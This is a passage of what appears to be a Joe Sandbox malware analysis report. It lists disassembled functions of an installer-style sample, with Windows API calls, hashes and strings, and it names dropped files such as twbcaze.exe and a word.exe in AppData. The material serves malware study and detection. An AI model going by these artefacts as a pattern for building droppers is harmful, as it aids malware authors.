                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                          • GetWindowRect.USER32(00000000,?), ref: 00405274
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                          • SendMessageA.USER32 ref: 004052D3
                                          • OpenClipboard.USER32(00000000), ref: 004052E3
                                          • EmptyClipboard.USER32 ref: 004052E9
                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                          • GlobalLock.KERNEL32 ref: 004052FC
                                          • SendMessageA.USER32 ref: 00405310
                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                          • SetClipboardData.USER32 ref: 00405333
                                          • CloseClipboard.USER32 ref: 00405339
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: {
                                          • API String ID: 590372296-366298937
                                          • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                          • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                          • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                          • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004047D3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 004047EA
                                          • GetDlgItem.USER32(?,00000408), ref: 004047F7
                                          • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404843
                                          • LoadBitmapA.USER32 ref: 00404856
                                          • SetWindowLongA.USER32(?,000000FC,00404DD4), ref: 00404870
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404884
                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404898
                                          • SendMessageA.USER32 ref: 004048AD
                                          • SendMessageA.USER32 ref: 004048B9
                                          • SendMessageA.USER32 ref: 004048CB
                                          • DeleteObject.GDI32(?), ref: 004048D0
                                          • SendMessageA.USER32 ref: 004048FB
                                          • SendMessageA.USER32 ref: 00404907
                                          • SendMessageA.USER32 ref: 0040499C
                                          • SendMessageA.USER32 ref: 004049C7
                                          • SendMessageA.USER32 ref: 004049DB
                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404A0A
                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A18
                                          • ShowWindow.USER32(?,00000005), ref: 00404A29
                                          • SendMessageA.USER32 ref: 00404B2C
                                          • SendMessageA.USER32 ref: 00404B91
                                          • SendMessageA.USER32 ref: 00404BA6
                                          • SendMessageA.USER32 ref: 00404BCA
                                          • SendMessageA.USER32 ref: 00404BF0
                                          • ImageList_Destroy.COMCTL32(?), ref: 00404C05
                                          • GlobalFree.KERNEL32(?), ref: 00404C15
                                          • SendMessageA.USER32 ref: 00404C85
                                          • SendMessageA.USER32 ref: 00404D2E
                                          • SendMessageA.USER32 ref: 00404D3D
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D5D
                                          • ShowWindow.USER32(?,00000000), ref: 00404DAB
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404DB6
                                          • ShowWindow.USER32(00000000), ref: 00404DBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 1638840714-813528018
                                          • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                          • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                          • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                          • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404292 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 004042E1
                                          • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                          • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                          • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                          • lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00420538,00000000,?,?), ref: 004043F9
                                          • lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ), ref: 00404405
                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                                            • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                            • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E52
                                            • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E5F
                                            • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E64
                                            • Part of subcall function 00405DFA: CharPrevA.USER32(?,?), ref: 00405E74
                                          • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                          • MulDiv.KERNEL32 ref: 004044F0
                                            • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                            • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                            • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" $A$C:\Users\user\AppData\Local\Temp
                                          • API String ID: 2624150263-861260144
                                          • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                          • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                          • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                          • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?), ref: 004020A6
                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 123533781-2935972921
                                          • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                          • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                          • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                          • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402671 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                          • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                          • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                          • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403F9C Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                          • String ID: N$open$.B
                                          • API String ID: 3615053054-720656042
                                          • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                          • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                          • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                          • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                          Download Yara Rule
                                          APIs
                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32 ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32 ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextA.USER32(00000000,nrdosueajqjitn Setup,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F$nrdosueajqjitn Setup
                                          • API String ID: 941294808-4081485430
                                          • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                          • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                          • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                          • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004058E6 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                            • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                          • CloseHandle.KERNEL32(00000000), ref: 00405933
                                          • GetShortPathNameA.KERNEL32 ref: 0040593C
                                          • GetShortPathNameA.KERNEL32 ref: 00405959
                                          • wsprintfA.USER32 ref: 00405977
                                          • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004059D7
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A2F
                                          • GlobalFree.KERNEL32(00000000), ref: 00405A36
                                          • CloseHandle.KERNEL32(00000000), ref: 00405A3D
                                            • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                            • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                          • String ID: %s=%s$@!B$[Rename]
                                          • API String ID: 3445103937-2946522640
                                          • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                          • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                          • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                          • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405BBA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                          • GetSystemDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000400), ref: 00405CDD
                                          • GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000400), ref: 00405CF0
                                          • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                          • SHGetPathFromIDListA.SHELL32(0040F0E0,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ), ref: 00405D3A
                                          • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                          • lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                          • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                          • String ID: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 900638850-569242587
                                          • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                          • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                          • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                          • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405DFA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe
                                          • API String ID: 589700163-2943609387
                                          • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                          • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                          • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                          • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403EBB Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                          • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                          • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                          • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004026AF Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                          Download Yara Rule
                                          APIs
